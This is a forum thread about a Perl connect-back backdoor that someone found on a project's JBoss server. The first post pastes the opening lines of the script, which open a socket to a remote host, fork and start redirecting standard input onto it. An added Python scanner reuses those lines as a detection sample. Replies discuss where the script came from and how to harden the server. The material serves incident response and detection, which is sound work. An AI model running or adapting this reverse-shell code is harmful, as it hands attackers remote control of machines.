Backdoor detected
  • Someone installed a backdoor on our server, but I have already removed it.

    Contents of the backdoor installed at $JBOSS_HOME/bin/connectback.txt.1 below:

    #!/usr/bin/perl
    use Socket;
    print "Team Carnivores Backdoor\n\n";
    if (!$ARGV[0]) {
    printf "Usage: $0 [Host] <Port>\n";
    exit(1);
    }
    print "[*] Dumping Arguments\n";
    $host = $ARGV[0];
    $port = 80;
    if ($ARGV[1]) {
    $port = $ARGV[1];
    }
    print "[*] Connecting...\n";
    $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("Unable to Connect\n");
    }
    print "[*] Spawning Shell\n";
    if (!fork( )) {
    open(STDIN,">&SERVER");
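
    The script above is a classic Perl "connect back" shell: it opens an outbound TCP socket to the host given on the command line and then dup's the standard handles onto that socket, which is what turns a plain network client into a remote shell. As an added example (not from this thread and not part of the dropped script), below is a small Python triage scanner that flags files carrying that behavioural pattern rather than just the banner string, since banner text differs between variants of the same script. The three sample scripts, their file names and the `example.invalid` hosts are constructed for the example; the only real detail reused is the `$JBOSS_HOME/bin/connectback.txt.1` path from the post.

```python
import re
from typing import Dict, List

# Indicators of a Perl "connect back" shell like the one dropped in
# $JBOSS_HOME/bin/connectback.txt.1. Patterns are constructed for this example.
INDICATORS = {
    # socket(HANDLE, PF_INET, SOCK_STREAM, ...): an outbound TCP socket
    "tcp_socket": re.compile(r"\bsocket\s*\(\s*\w+\s*,\s*PF_INET\s*,\s*SOCK_STREAM"),
    # connect(...): the script reaches out to a host rather than listening
    "outbound_connect": re.compile(r"\bconnect\s*\("),
    # fork(): detach so the shell runs independently of the caller
    "fork": re.compile(r"\bfork\s*\("),
    # open(STDIN,">&SOCK") etc.: a standard handle dup'd onto the socket,
    # which is what turns a network client into a remote shell
    "stdio_to_socket": re.compile(r"\bopen\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*['\"]>&"),
    # banner strings seen in this family; weak on their own because they get edited
    "marker_string": re.compile(r"connect\s*back\s*backdoor|team carnivores backdoor", re.I),
}

def find_indicators(text: str) -> List[str]:
    """Return the names of all indicators present in one script's text."""
    return [name for name, pat in INDICATORS.items() if pat.search(text)]

def is_connect_back(text: str) -> bool:
    """Flag only on the behavioural triad: socket + connect + stdio redirected to it.
    A banner match alone is not enough, and neither is a plain socket client."""
    hits = set(find_indicators(text))
    return {"tcp_socket", "outbound_connect", "stdio_to_socket"} <= hits

def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each flagged path to its indicators. Input is path -> contents so the
    example runs offline; on a real host feed it from os.walk() over $JBOSS_HOME."""
    return {path: find_indicators(body) for path, body in files.items()
            if is_connect_back(body)}

# Constructed sample 1: the opening lines of the dropped script (as posted above).
SUSPECT = r'''#!/usr/bin/perl
use Socket;
print "Team Carnivores Backdoor\n\n";
$host = $ARGV[0]; $port = 80;
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); }
if (!fork( )) {
open(STDIN,">&SERVER");
'''

# Constructed sample 2: a harmless maintenance script (hypothetical), no raw socket.
BENIGN = r'''#!/usr/bin/perl
use strict; use LWP::Simple;
my $page = get("http://example.invalid/status") or die "fetch failed";
open(my $fh, ">", "/var/tmp/status.txt") or die; print $fh $page; close $fh;
'''

# Constructed sample 3: a legitimate socket client (hypothetical monitoring check).
# It creates a socket and connects, but never redirects STDIN/STDOUT onto it.
CLIENT = r'''#!/usr/bin/perl
use Socket;
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die;
connect(SOCK, sockaddr_in(25, inet_aton("mail.example.invalid"))) or die;
print SOCK "QUIT\r\n"; close SOCK;
'''

SAMPLE_FILES = {
    "connectback.txt.1": SUSPECT,
    "fetch_status.pl": BENIGN,
    "smtp_check.pl": CLIENT,
}

if __name__ == "__main__":
    flagged = scan_files(SAMPLE_FILES)
    for path, hits in flagged.items():
        print(f"[!] {path}: suspected connect-back shell ({', '.join(hits)})")
    for path, body in SAMPLE_FILES.items():
        if path not in flagged:
            print(f"[ ] {path}: {find_indicators(body) or 'no indicators'}")
```

    Requiring the triad is what keeps the false-positive rate tolerable: `smtp_check.pl` creates a socket and connects, and so trips two indicators, but is not flagged because nothing redirects a standard handle onto the socket. A hit like `connectback.txt.1` is the starting point of the investigation, not the end of it, since the file only tells you something was already able to write into `$JBOSS_HOME/bin`.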

     
  • mjnmjn
    January 2012
    I'm no Perl expert, but it looks like a completely open backdoor that would allow scripts to be loaded and run.  Nasty.  Nice catch, Elifarely.

    - Mark
     
  • mjnmjn
    January 2012
    I ran a Google search on "Team Carnivores Backdoor".  Not much in the way of results, except this.  "Carnivore" was the project name for a software system that would allow the FBI to collect information.  It is now called DCS1000.  RIPA is a similar kind of thing that monitors internet traffic and email.

    It seems unlikely to me that the FBI is interested in OSE.  More likely a hacker organization is re-using the name.

    - Mark
     
  • I only removed the malicious script. Our VPS provider, Hetzner, has detected it, so we should thank them :)

     
  • Yeah, the 'Team Carnivores Backdoor' seems to have been edited in, because other versions of the script I found have 'Data Cha0s Connect Back Backdoor' (http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-10/) but otherwise identical code; this seems to be the more common version of the code.

    An important thing to note is that someone has used another exploit to put this here; that means somewhere the system is open and should be closed.

    As an open project I doubt you have many secrets; however, every effort should be made to protect personal data and to maintain backups in a secure location, preferably not connected to the internet.

    It's probably nothing (it could have been dropped by an automated system utilizing known exploits), but with the amount of hacking going around these days it's better to be safe than sorry - change passwords and make sure they're strong, that sort of thing.

    Here's a thread that might be of interest from the Ubuntu forums: http://ubuntuforums.org/showthread.php?p=9779391
     
  • The most common point of using backdoors is the possibility to send spam. I have that problem on my websites and my host operator isn't so helpful - they just block the account.
     
